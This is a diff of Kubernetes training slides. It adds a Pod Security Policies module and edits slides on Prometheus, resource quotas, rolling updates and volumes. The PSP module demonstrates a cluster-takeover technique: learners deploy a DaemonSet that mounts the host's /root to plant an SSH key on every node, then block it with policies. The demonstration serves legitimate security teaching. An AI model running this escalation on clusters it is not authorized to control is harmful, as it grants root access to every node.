for SERVICE in hasher rng webui worker; do
|
||||
kubectl create deployment $SERVICE --image=$REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
|
||||
500
slides/k8s/podsecuritypolicy.md
Normal file
500
slides/k8s/podsecuritypolicy.md
Normal file
@@ -0,0 +1,500 @@
|
||||
# Pod Security Policies
|
||||
|
||||
- By default, our pods and containers can do *everything*
|
||||
|
||||
(including taking over the entire cluster)
|
||||
|
||||
- We are going to show an example of a malicious pod
|
||||
|
||||
- Then we will explain how to avoid this with PodSecurityPolicies
|
||||
|
||||
- We will enable PodSecurityPolicies on our cluster
|
||||
|
||||
- We will create a couple of policies (restricted and permissive)
|
||||
|
||||
- Finally we will see how to use them to improve security on our cluster
|
||||
|
||||
---
|
||||
|
||||
## Setting up a namespace
|
||||
|
||||
- For simplicity, let's work in a separate namespace
|
||||
|
||||
- Let's create a new namespace called "green"
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the "green" namespace:
|
||||
```bash
|
||||
kubectl create namespace green
|
||||
```
|
||||
|
||||
- Change to that namespace:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Creating a basic Deployment
|
||||
|
||||
- Just to check that everything works correctly, deploy NGINX
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a Deployment using the official NGINX image:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment, ReplicaSet, and Pod exist, and that the Pod is running:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## One example of malicious pods
|
||||
|
||||
- We will now show an escalation technique in action
|
||||
|
||||
- We will deploy a DaemonSet that adds our SSH key to the root account
|
||||
|
||||
(on *each* node of the cluster)
|
||||
|
||||
- The Pods of the DaemonSet will do so by mounting `/root` from the host
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the file `k8s/hacktheplanet.yaml` with a text editor:
|
||||
```bash
|
||||
vim ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- If you would like, change the SSH key (by changing the GitHub user name)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the malicious pods
|
||||
|
||||
- Let's deploy our "exploit"!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Check that the pods are running:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
- Confirm that the SSH key was added to the node's root account:
|
||||
```bash
|
||||
sudo cat /root/.ssh/authorized_keys
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cleaning up
|
||||
|
||||
- Before setting up our PodSecurityPolicies, clean up that namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the DaemonSet:
|
||||
```bash
|
||||
kubectl delete daemonset hacktheplanet
|
||||
```
|
||||
|
||||
- Remove the Deployment:
|
||||
```bash
|
||||
kubectl delete deployment web
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in theory
|
||||
|
||||
- To use PSPs, we need to activate their specific *admission controller*
|
||||
|
||||
- That admission controller will intercept each pod creation attempt
|
||||
|
||||
- It will look at:
|
||||
|
||||
- *who/what* is creating the pod
|
||||
|
||||
- which PodSecurityPolicies they can use
|
||||
|
||||
- which PodSecurityPolicies can be used by the Pod's ServiceAccount
|
||||
|
||||
- Then it will compare the Pod with each PodSecurityPolicy one by one
|
||||
|
||||
- If a PodSecurityPolicy accepts all the parameters of the Pod, it is created
|
||||
|
||||
- Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods`
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies fine print
|
||||
|
||||
- With RBAC, using a PSP corresponds to the verb `use` on the PSP
|
||||
|
||||
(that makes sense, right?)
|
||||
|
||||
- If no PSP is defined, no Pod can be created
|
||||
|
||||
(even by cluster admins)
|
||||
|
||||
- Pods that are already running are *not* affected
|
||||
|
||||
- If we create a Pod directly, it can use a PSP to which *we* have access
|
||||
|
||||
- If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different:
|
||||
|
||||
- the ReplicaSet / DaemonSet controllers don't have access to *our* policies
|
||||
|
||||
- therefore, we need to give access to the PSP to the Pod's ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in practice
|
||||
|
||||
- We are going to enable the PodSecurityPolicy admission controller
|
||||
|
||||
- At that point, we won't be able to create any more pods (!)
|
||||
|
||||
- Then we will create a couple of PodSecurityPolicies
|
||||
|
||||
- ...And associated ClusterRoles (giving `use` access to the policies)
|
||||
|
||||
- Then we will create RoleBindings to grant these roles to ServiceAccounts
|
||||
|
||||
- We will verify that we can't run our "exploit" anymore
|
||||
|
||||
---
|
||||
|
||||
## Enabling Pod Security Policies
|
||||
|
||||
- To enable Pod Security Policies, we need to enable their *admission plugin*
|
||||
|
||||
- This is done by adding a flag to the API server
|
||||
|
||||
- On clusters deployed with `kubeadm`, the control plane runs in static pods
|
||||
|
||||
- These pods are defined in YAML files located in `/etc/kubernetes/manifests`
|
||||
|
||||
- Kubelet watches this directory
|
||||
|
||||
- Each time a file is added/removed there, kubelet creates/deletes the corresponding pod
|
||||
|
||||
- Updating a file causes the pod to be deleted and recreated
|
||||
|
||||
---
|
||||
|
||||
## Updating the API server flags
|
||||
|
||||
- Let's edit the manifest for the API server pod
|
||||
|
||||
.exercise[
|
||||
|
||||
- Have a look at the static pods:
|
||||
```bash
|
||||
ls -l /etc/kubernetes/manifests
|
||||
```
|
||||
|
||||
- Edit the one corresponding to the API server:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding the PSP admission plugin
|
||||
|
||||
- There should already be a line with `--enable-admission-plugins=...`
|
||||
|
||||
- Let's add `PodSecurityPolicy` on that line
|
||||
|
||||
.exercise[
|
||||
|
||||
- Locate the line with `--enable-admission-plugins=`
|
||||
|
||||
- Add `PodSecurityPolicy`
|
||||
|
||||
It should read: `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy`
|
||||
|
||||
- Save, quit
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Waiting for the API server to restart
|
||||
|
||||
- The kubelet detects that the file was modified
|
||||
|
||||
- It kills the API server pod, and starts a new one
|
||||
|
||||
- During that time, the API server is unavailable
|
||||
|
||||
.exercise[
|
||||
|
||||
- Wait until the API server is available again
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check that the admission plugin is active
|
||||
|
||||
- Normally, we can't create any Pod at this point
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp1 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Try to create a Deployment:
|
||||
```bash
|
||||
kubectl run testpsp2 --image=nginx
|
||||
```
|
||||
|
||||
- Look at existing resources:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can get hints at what's happening by looking at the ReplicaSet and Events.
|
||||
|
||||
---
|
||||
|
||||
## Introducing our Pod Security Policies
|
||||
|
||||
- We will create two policies:
|
||||
|
||||
- privileged (allows everything)
|
||||
|
||||
- restricted (blocks some unsafe mechanisms)
|
||||
|
||||
- For each policy, we also need an associated ClusterRole granting *use*
|
||||
|
||||
---
|
||||
|
||||
## Creating our Pod Security Policies
|
||||
|
||||
- We have a couple of files, each defining a PSP and associated ClusterRole:
|
||||
|
||||
- k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged`
|
||||
- k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create both policies and their associated ClusterRoles:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/psp-restricted.yaml
|
||||
kubectl create -f ~/container.training/k8s/psp-privileged.yaml
|
||||
```
|
||||
]
|
||||
|
||||
- The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies)
|
||||
|
||||
- The restricted policy is inspired by that same documentation page
|
||||
|
||||
---
|
||||
|
||||
## Check that we can create Pods again
|
||||
|
||||
- We haven't bound the policy to any user yet
|
||||
|
||||
- But `cluster-admin` can implicitly `use` all policies
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we can now create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp3 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Create a Deployment as well:
|
||||
```bash
|
||||
kubectl run testpsp4 --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment is *not* creating any Pods:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's going on?
|
||||
|
||||
- We can create Pods directly (thanks to our root-like permissions)
|
||||
|
||||
- The Pods corresponding to a Deployment are created by the ReplicaSet controller
|
||||
|
||||
- The ReplicaSet controller does *not* have root-like permissions
|
||||
|
||||
- We need to either:
|
||||
|
||||
- grant permissions to the ReplicaSet controller
|
||||
|
||||
*or*
|
||||
|
||||
- grant permissions to our Pods' ServiceAccount
|
||||
|
||||
- The first option would allow *anyone* to create pods
|
||||
|
||||
- The second option will allow us to scope the permissions better
|
||||
|
||||
---
|
||||
|
||||
## Binding the restricted policy
|
||||
|
||||
- Let's bind the role `psp:restricted` to ServiceAccount `green:default`
|
||||
|
||||
(aka the default ServiceAccount in the green Namespace)
|
||||
|
||||
- This will allow Pod creation in the green Namespace
|
||||
|
||||
(because these Pods will be using that ServiceAccount automatically)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the following RoleBinding:
|
||||
```bash
|
||||
kubectl create rolebinding psp:restricted \
|
||||
--clusterrole=psp:restricted \
|
||||
--serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- The Deployments that we created earlier will *eventually* recover
|
||||
|
||||
(the ReplicaSet controller will retry to create Pods once in a while)
|
||||
|
||||
- If we create a new Deployment now, it should work immediately
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a simple Deployment:
|
||||
```bash
|
||||
kubectl create deployment testpsp5 --image=nginx
|
||||
```
|
||||
|
||||
- Look at the Pods that have been created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying to hack the cluster
|
||||
|
||||
- Let's create the same DaemonSet we used earlier
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a hostile DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Look at the state of the namespace:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's in our restricted policy?
|
||||
|
||||
- The restricted PSP is similar to the one provided in the docs, but:
|
||||
|
||||
- it allows containers to run as root
|
||||
|
||||
- it doesn't drop capabilities
|
||||
|
||||
- Many containers run as root by default, and would require additional tweaks
|
||||
|
||||
- Many containers use e.g. `chown`, which requires a specific capability
|
||||
|
||||
(that's the case for the NGINX official image, for instance)
|
||||
|
||||
- We still block: hostPath, privileged containers, and much more!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The case of static pods
|
||||
|
||||
- If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing
|
||||
|
||||
- However, the API server is obviously running
|
||||
|
||||
(otherwise, `kubectl get pods --namespace=kube-system` wouldn't work)
|
||||
|
||||
- The API server Pod is created directly by kubelet
|
||||
|
||||
(without going through the PSP admission plugin)
|
||||
|
||||
- Then, kubelet creates a "mirror pod" representing that Pod in etcd
|
||||
|
||||
- That "mirror pod" creation goes through the PSP admission plugin
|
||||
|
||||
- And it gets blocked!
|
||||
|
||||
- This can be fixed by binding `psp:privileged` to group `system:nodes`
|
||||
|
||||
---
|
||||
|
||||
## .warning[Before moving on...]
|
||||
|
||||
- Our cluster is currently broken
|
||||
|
||||
(we can't create pods in namespaces kube-system, default, ...)
|
||||
|
||||
- We need to either:
|
||||
|
||||
- disable the PSP admission plugin
|
||||
|
||||
- allow use of PSP to relevant users and groups
|
||||
|
||||
- For instance, we could:
|
||||
|
||||
- bind `psp:restricted` to the group `system:authenticated`
|
||||
|
||||
- bind `psp:privileged` to the ServiceAccount `kube-system:default`
|
||||
@@ -12,7 +12,7 @@
|
||||
|
||||
- an *alert manager* to notify us according to metrics values or trends
|
||||
|
||||
- We are going to deploy it on our Kubernetes cluster and see how to query it
|
||||
- We are going to use it to collect and query some metrics on our Kubernetes cluster
|
||||
|
||||
---
|
||||
|
||||
@@ -20,7 +20,7 @@
|
||||
|
||||
- We don't endorse Prometheus more or less than any other system
|
||||
|
||||
- It's relatively well integrated within the Cloud Native ecosystem
|
||||
- It's relatively well integrated within the cloud-native ecosystem
|
||||
|
||||
- It can be self-hosted (this is useful for tutorials like this)
|
||||
|
||||
@@ -145,7 +145,28 @@ scrape_configs:
|
||||
|
||||
(it will even be gentler on the I/O subsystem since it needs to write less)
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
- Would you like to know more? Check this video:
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
|
||||
---
|
||||
|
||||
## Checking if Prometheus is installed
|
||||
|
||||
- Before trying to install Prometheus, let's check if it's already there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look for services with a label `app=prometheus` across all namespaces:
|
||||
```bash
|
||||
kubectl get services --selector=app=prometheus --all-namespaces
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If we see a `NodePort` service called `prometheus-server`, we're good!
|
||||
|
||||
(We can then skip to "Connecting to the Prometheus web UI".)
|
||||
|
||||
---
|
||||
|
||||
@@ -161,7 +182,7 @@ We need to:
|
||||
|
||||
- Run the *node exporter* on each node (with a Daemon Set)
|
||||
|
||||
- Setup a Service Account so that Prometheus can query the Kubernetes API
|
||||
- Set up a Service Account so that Prometheus can query the Kubernetes API
|
||||
|
||||
- Configure the Prometheus server
|
||||
|
||||
@@ -169,11 +190,11 @@ We need to:
|
||||
|
||||
---
|
||||
|
||||
## Helm Charts to the rescue
|
||||
## Helm charts to the rescue
|
||||
|
||||
- To make our lives easier, we are going to use a Helm Chart
|
||||
- To make our lives easier, we are going to use a Helm chart
|
||||
|
||||
- The Helm Chart will take care of all the steps explained above
|
||||
- The Helm chart will take care of all the steps explained above
|
||||
|
||||
(including some extra features that we don't need, but won't hurt)
|
||||
|
||||
@@ -210,20 +231,41 @@ We need to:
|
||||
|
||||
- Install Prometheus on our cluster:
|
||||
```bash
|
||||
helm install stable/prometheus \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.persistentVolume.enabled=false
|
||||
helm upgrade prometheus stable/prometheus \
|
||||
--install \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The provided flags:
|
||||
Curious about all these flags? They're explained in the next slide.
|
||||
|
||||
- expose the server web UI (and API) on a NodePort
|
||||
---
|
||||
|
||||
- use an ephemeral volume for metrics storage
|
||||
<br/>
|
||||
(instead of requesting a Persistent Volume through a Persistent Volume Claim)
|
||||
class: extra-details
|
||||
|
||||
## Explaining all the Helm flags
|
||||
|
||||
- `helm upgrade prometheus` → upgrade release "prometheus" to the latest version...
|
||||
|
||||
(a "release" is a unique name given to an app deployed with Helm)
|
||||
|
||||
- `stable/prometheus` → ... of the chart `prometheus` in repo `stable`
|
||||
|
||||
- `--install` → if the app doesn't exist, create it
|
||||
|
||||
- `--namespace kube-system` → put it in that specific namespace
|
||||
|
||||
- And set the following *values* when rendering the chart's templates:
|
||||
|
||||
- `server.service.type=NodePort` → expose the Prometheus server with a NodePort
|
||||
- `server.service.nodePort=30090` → set the specific NodePort number to use
|
||||
- `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim
|
||||
- `alertmanager.enabled=false` → disable the alert manager entirely
|
||||
|
||||
---
|
||||
|
||||
@@ -235,7 +277,7 @@ The provided flags:
|
||||
|
||||
- Figure out the NodePort that was allocated to the Prometheus server:
|
||||
```bash
|
||||
kubectl get svc | grep prometheus-server
|
||||
kubectl get svc --all-namespaces | grep prometheus-server
|
||||
```
|
||||
|
||||
- With your browser, connect to that port
|
||||
@@ -246,7 +288,7 @@ The provided flags:
|
||||
|
||||
## Querying some metrics
|
||||
|
||||
- This is easy ... if you are familiar with PromQL
|
||||
- This is easy... if you are familiar with PromQL
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -292,13 +334,13 @@ This query will show us CPU usage across all containers:
|
||||
container_cpu_usage_seconds_total
|
||||
```
|
||||
|
||||
- The suffix of the metrics name tells us:
|
||||
- The suffix of the metrics name tells us:
|
||||
|
||||
- the unit (seconds of CPU)
|
||||
|
||||
- that it's the total used since the container creation
|
||||
|
||||
- Since it's a "total", it is an increasing quantity
|
||||
- Since it's a "total," it is an increasing quantity
|
||||
|
||||
(we need to compute the derivative if we want e.g. CPU % over time)
|
||||
|
||||
@@ -391,9 +433,9 @@ class: extra-details
|
||||
|
||||
- I/O activity (disk, network), per operation or volume
|
||||
|
||||
- Physical/hardware (when applicable): temperature, fan speed ...
|
||||
- Physical/hardware (when applicable): temperature, fan speed...
|
||||
|
||||
- ... and much more!
|
||||
- ...and much more!
|
||||
|
||||
---
|
||||
|
||||
@@ -406,7 +448,7 @@ class: extra-details
|
||||
- RAM breakdown will be different
|
||||
|
||||
- active vs inactive memory
|
||||
- some memory is *shared* between containers, and accounted specially
|
||||
- some memory is *shared* between containers, and specially accounted for
|
||||
|
||||
- I/O activity is also harder to track
|
||||
|
||||
@@ -425,11 +467,11 @@ class: extra-details
|
||||
|
||||
- Arbitrary metrics related to your application and business
|
||||
|
||||
- System performance: request latency, error rate ...
|
||||
- System performance: request latency, error rate...
|
||||
|
||||
- Volume information: number of rows in database, message queue size ...
|
||||
- Volume information: number of rows in database, message queue size...
|
||||
|
||||
- Business data: inventory, items sold, revenue ...
|
||||
- Business data: inventory, items sold, revenue...
|
||||
|
||||
---
|
||||
|
||||
@@ -453,7 +495,7 @@ class: extra-details
|
||||
|
||||
## Querying labels
|
||||
|
||||
- What if we want to get metrics for containers belong to pod tagged `worker`?
|
||||
- What if we want to get metrics for containers belonging to a pod tagged `worker`?
|
||||
|
||||
- The cAdvisor exporter does not give us Kubernetes labels
|
||||
|
||||
@@ -486,3 +528,21 @@ class: extra-details
|
||||
- see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview
|
||||
|
||||
- or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process
|
||||
|
||||
---
|
||||
|
||||
## In practice
|
||||
|
||||
- Grafana is a beautiful (and useful) frontend to display all kinds of graphs
|
||||
|
||||
- Not everyone needs to know Prometheus, PromQL, Grafana, etc.
|
||||
|
||||
- But in a team, it is valuable to have at least one person who know them
|
||||
|
||||
- That person can set up queries and dashboards for the rest of the team
|
||||
|
||||
- It's a little bit like knowing how to optimize SQL queries, Dockerfiles...
|
||||
|
||||
Don't panic if you don't know these tools!
|
||||
|
||||
...But make sure at least one person in your team is on it 💯
|
||||
|
||||
@@ -86,17 +86,17 @@ Each pod is assigned a QoS class (visible in `status.qosClass`).
|
||||
|
||||
- as long as the container uses less than the limit, it won't be affected
|
||||
|
||||
- if all containers in a pod have *(limits=requests)*, QoS is "Guaranteed"
|
||||
- if all containers in a pod have *(limits=requests)*, QoS is considered "Guaranteed"
|
||||
|
||||
- If requests < limits:
|
||||
|
||||
- as long as the container uses less than the request, it won't be affected
|
||||
|
||||
- otherwise, it might be killed / evicted if the node gets overloaded
|
||||
- otherwise, it might be killed/evicted if the node gets overloaded
|
||||
|
||||
- if at least one container has *(requests<limits)*, QoS is "Burstable"
|
||||
- if at least one container has *(requests<limits)*, QoS is considered "Burstable"
|
||||
|
||||
- If a pod doesn't have any request nor limit, QoS is "BestEffort"
|
||||
- If a pod doesn't have any request nor limit, QoS is considered "BestEffort"
|
||||
|
||||
---
|
||||
|
||||
@@ -392,7 +392,7 @@ These quotas will apply to the namespace where the ResourceQuota is created.
|
||||
count/roles.rbac.authorization.k8s.io: 10
|
||||
```
|
||||
|
||||
(The `count/` syntax allows to limit arbitrary objects, including CRDs.)
|
||||
(The `count/` syntax allows limiting arbitrary objects, including CRDs.)
|
||||
|
||||
---
|
||||
|
||||
@@ -400,7 +400,7 @@ These quotas will apply to the namespace where the ResourceQuota is created.
|
||||
|
||||
- Quotas can be created with a YAML definition
|
||||
|
||||
- ... Or with the `kubectl create quota` command
|
||||
- ...Or with the `kubectl create quota` command
|
||||
|
||||
- Example:
|
||||
```bash
|
||||
|
||||
@@ -5,9 +5,9 @@
|
||||
- new pods are created
|
||||
|
||||
- old pods are terminated
|
||||
|
||||
|
||||
- ... all at the same time
|
||||
|
||||
|
||||
- if something goes wrong, ¯\\\_(ツ)\_/¯
|
||||
|
||||
---
|
||||
@@ -28,7 +28,7 @@
|
||||
|
||||
- there will therefore be up to `maxUnavailable`+`maxSurge` pods being updated
|
||||
|
||||
- We have the possibility to rollback to the previous version
|
||||
- We have the possibility of rolling back to the previous version
|
||||
<br/>(if the update fails or is unsatisfactory in any way)
|
||||
|
||||
---
|
||||
@@ -49,7 +49,6 @@
|
||||
|
||||
---
|
||||
|
||||
|
||||
## Rolling updates in practice
|
||||
|
||||
- As of Kubernetes 1.8, we can do rolling updates with:
|
||||
@@ -64,12 +63,15 @@
|
||||
|
||||
## Building a new version of the `worker` service
|
||||
|
||||
.warning[
|
||||
Only run these commands if you have built and pushed DockerCoins to a local registry.
|
||||
<br/>
|
||||
If you are using images from the Docker Hub (`dockercoins/worker:v0.1`), skip this.
|
||||
]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Go to the `stack` directory:
|
||||
```bash
|
||||
cd ~/container.training/stacks
|
||||
```
|
||||
- Go to the `stacks` directory (`~/container.training/stacks`)
|
||||
|
||||
- Edit `dockercoins/worker/worker.py`; update the first `sleep` line to sleep 1 second
|
||||
|
||||
@@ -210,7 +212,7 @@ class: extra-details
|
||||
|
||||
## Checking the dashboard during the bad rollout
|
||||
|
||||
If you haven't deployed the Kubernetes dashboard earlier, just skip this slide.
|
||||
If you didn't deploy the Kubernetes dashboard earlier, just skip this slide.
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -253,7 +255,7 @@ Note the `3xxxx` port.
|
||||
```
|
||||
-->
|
||||
|
||||
- Cancel the deployment and wait for the dust to settle down:
|
||||
- Cancel the deployment and wait for the dust to settle:
|
||||
```bash
|
||||
kubectl rollout undo deploy worker
|
||||
kubectl rollout status deploy worker
|
||||
|
||||
@@ -90,4 +90,4 @@
|
||||
|
||||
- For a longer list, check the Kubernetes documentation:
|
||||
<br/>
|
||||
it has a great guide to [pick the right solution](https://kubernetes.io/docs/setup/pick-right-solution/) to set up Kubernetes.
|
||||
it has a great guide to [pick the right solution](https://kubernetes.io/docs/setup/#production-environment) to set up Kubernetes.
|
||||
|
||||
@@ -20,7 +20,7 @@ with a cloud provider
|
||||
|
||||
## EKS (the hard way)
|
||||
|
||||
- [Read the doc](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html)
|
||||
- [Read the doc](https://docs.aws.amazon.com/eks/latest/userguide/getting-started-console.html)
|
||||
|
||||
- Create service roles, VPCs, and a bunch of other oddities
|
||||
|
||||
@@ -69,6 +69,8 @@ with a cloud provider
|
||||
eksctl get clusters
|
||||
```
|
||||
|
||||
.footnote[Note: the AWS documentation has been updated and now includes [eksctl instructions](https://docs.aws.amazon.com/eks/latest/userguide/getting-started-eksctl.html).]
|
||||
|
||||
---
|
||||
|
||||
## GKE (initial setup)
|
||||
|
||||
@@ -34,13 +34,13 @@
|
||||
|
||||
- Each pod can discover the IP address of the others easily
|
||||
|
||||
- The pods can have persistent volumes attached to them
|
||||
- The pods can persist data on attached volumes
|
||||
|
||||
🤔 Wait a minute ... Can't we already attach volumes to pods and deployments?
|
||||
|
||||
---
|
||||
|
||||
## Volumes and Persistent Volumes
|
||||
## Revisiting volumes
|
||||
|
||||
- [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes:
|
||||
|
||||
@@ -50,13 +50,13 @@
|
||||
|
||||
- accessing storage systems
|
||||
|
||||
- The last type of volumes is known as a "Persistent Volume"
|
||||
- Let's see examples of the latter usage
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volumes types
|
||||
## Volumes types
|
||||
|
||||
- There are many [types of Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/#types-of-persistent-volumes) available:
|
||||
- There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available:
|
||||
|
||||
- public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...)
|
||||
|
||||
@@ -74,7 +74,7 @@
|
||||
|
||||
---
|
||||
|
||||
## Using a Persistent Volume
|
||||
## Using a cloud volume
|
||||
|
||||
Here is a pod definition using an AWS EBS volume (that has to be created first):
|
||||
|
||||
@@ -99,7 +99,32 @@ spec:
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of Persistent Volumes
|
||||
## Using an NFS volume
|
||||
|
||||
Here is another example using a volume on an NFS server:
|
||||
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: pod-using-my-nfs-volume
|
||||
spec:
|
||||
containers:
|
||||
- image: ...
|
||||
name: container-using-my-nfs-volume
|
||||
volumeMounts:
|
||||
- mountPath: /my-nfs
|
||||
name: my-nfs-volume
|
||||
volumes:
|
||||
- name: my-nfs-volume
|
||||
nfs:
|
||||
server: 192.168.0.55
|
||||
path: "/exports/assets"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Shortcomings of volumes
|
||||
|
||||
- Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API
|
||||
|
||||
@@ -125,17 +150,47 @@ spec:
|
||||
|
||||
- This type is a *Persistent Volume Claim*
|
||||
|
||||
- A Persistent Volume Claim (PVC) is a resource type
|
||||
|
||||
(visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`)
|
||||
|
||||
- A PVC is not a volume; it is a *request for a volume*
|
||||
|
||||
---
|
||||
|
||||
## Persistent Volume Claims in practice
|
||||
|
||||
- Using a Persistent Volume Claim is a two-step process:
|
||||
|
||||
- creating the claim
|
||||
|
||||
- using the claim in a pod (as if it were any other kind of volume)
|
||||
|
||||
- Between these two steps, something will happen behind the scenes:
|
||||
- A PVC starts by being Unbound (without an associated volume)
|
||||
|
||||
- Kubernetes will associate an existing volume with the claim
|
||||
- Once it is associated with a Persistent Volume, it becomes Bound
|
||||
|
||||
- ... or dynamically create a volume if possible and necessary
|
||||
- A Pod referring an unbound PVC will not start
|
||||
|
||||
(but as soon as the PVC is bound, the Pod can start)
|
||||
|
||||
---
|
||||
|
||||
## Binding PV and PVC
|
||||
|
||||
- A Kubernetes controller continuously watches PV and PVC objects
|
||||
|
||||
- When it notices an unbound PVC, it tries to find a satisfactory PV
|
||||
|
||||
("satisfactory" in terms of size and other characteristics; see next slide)
|
||||
|
||||
- If no PV fits the PVC, a PV can be created dynamically
|
||||
|
||||
(this requires to configure a *dynamic provisioner*, more on that later)
|
||||
|
||||
- Otherwise, the PVC remains unbound indefinitely
|
||||
|
||||
(until we manually create a PV or setup dynamic provisioning)
|
||||
|
||||
---
|
||||
|
||||
@@ -147,7 +202,9 @@ spec:
|
||||
|
||||
- the access mode (e.g. "read-write by a single pod")
|
||||
|
||||
- It can also give extra details, like:
|
||||
- Optionally, it can also specify a Storage Class
|
||||
|
||||
- The Storage Class indicates:
|
||||
|
||||
- which storage system to use (e.g. Portworx, EBS...)
|
||||
|
||||
@@ -155,8 +212,6 @@ spec:
|
||||
|
||||
e.g.: "replicate the data 3 times, and use SSD media"
|
||||
|
||||
- The extra details are provided by specifying a Storage Class
|
||||
|
||||
---
|
||||
|
||||
## What's a Storage Class?
|
||||
@@ -167,15 +222,15 @@ spec:
|
||||
|
||||
- It indicates which *provisioner* to use
|
||||
|
||||
(which controller will create the actual volume)
|
||||
|
||||
- And arbitrary parameters for that provisioner
|
||||
|
||||
(replication levels, type of disk ... anything relevant!)
|
||||
|
||||
- It is necessary to define a Storage Class to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
- Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
|
||||
|
||||
- Conversely, it is not necessary to define one if you will create volumes manually
|
||||
|
||||
(we will see dynamic provisioning in action later)
|
||||
(but we can also create volumes manually, and ignore Storage Classes)
|
||||
|
||||
---
|
||||
|
||||
@@ -200,7 +255,7 @@ spec:
|
||||
|
||||
## Using a Persistent Volume Claim
|
||||
|
||||
Here is the same definition as earlier, but using a PVC:
|
||||
Here is a Pod definition like the ones shown earlier, but using a PVC:
|
||||
|
||||
```yaml
|
